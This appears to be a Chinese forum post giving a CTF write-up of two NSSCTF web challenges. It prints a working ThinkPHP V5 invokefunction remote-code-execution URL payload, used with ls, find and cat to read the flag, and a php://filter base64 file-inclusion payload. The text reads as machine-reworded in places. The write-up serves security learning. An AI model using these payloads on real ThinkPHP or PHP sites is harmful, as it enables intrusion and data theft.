首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
数据库
›
SQL-Server
›
NSSCTF-Web题目7
返回列表
发新帖
NSSCTF-Web题目7
[复制链接]
发表于 2024-6-27 06:20:47
|
显示全部楼层
|
阅读模式
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
目录
[SWPUCTF 2022 新生赛]ez_rce
1、题目
2、知识点
3、思绪
编辑
[MoeCTF 2022]baby_file
1、题目
2、知识点
3、思绪
[SWPUCTF 2022 新生赛]ez_rce
1、题目
2、知识点
ThinkPHP V5 框架毛病的利用,下令执行
由于ThinkPHP5在处理控制器传参时,没有对参数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL参数的形式访问该方法,从而触发长途
代码
执行毛病。
3、思绪
打开题目,发现什么都没有,源
代码
里面也什么都没有,这时间实验目录扫描
访问这个文件
接着访问提示文件
效果出现一个框架界面,ThinkPHP V5的框架,没有其他提示,上网搜一下这个框架,发现有一个长途执行下令的毛病。
可以记住这一个框架毛病,以后大概会利用到
利用poc如下:
url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统执行下令
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
发现flag文件,效果打开什么都没有,找其他flag文件
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name 'flag'
在 /nss/ctf/flag/flag 找到flag
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /nss/ctf/flag/flag
得到flag:NSSCTF{1671b36a-f1ad-4b41-98c7-ffbe7acb2959}
[MoeCTF 2022]baby_file
1、题目
2、知识点
php伪协议
3、思绪
打开题目,出现源
代码
,没有其他提示,需要我们输入参数file的值
源码中有include()函数,考虑使用php伪协议,一般flag放在flag.php文件中
所以poc如下
?file=php://filter/read=convert.base64-encode/resource=flag.php
将得到的base64编码进行解码
得到flag:NSSCTF{9906ab65-97ea-400e-a1fa-72d7847a2e7a}
这篇文章就先写到这里了,那里不懂的或者不足的欢迎指出
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
回复
使用道具
举报
返回列表
欢乐狗
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表